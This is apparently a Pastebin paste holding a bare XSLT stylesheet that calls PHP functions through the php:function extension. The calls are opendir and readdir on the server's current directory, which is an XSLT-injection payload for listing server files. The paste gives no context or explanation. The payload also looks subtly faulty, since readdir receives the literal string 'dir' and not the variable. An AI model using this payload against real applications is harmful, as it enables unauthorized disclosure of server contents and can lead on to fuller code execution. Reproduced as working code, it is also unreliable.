Advertisement
Guest User

Untitled

a guest
Dec 8th, 2019
90
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.33 KB | None | 0 0
  1. <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">
  2. <xsl:output method="html" encoding="utf-8"/>
  3. <xsl:template match="/">
  4. <xsl:variable name="dir" select="php:function('opendir','.')"/>
  5. <xsl:value-of select="php:function('readdir','dir')"/>
  6. </xsl:template>
  7. </xsl:stylesheet>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement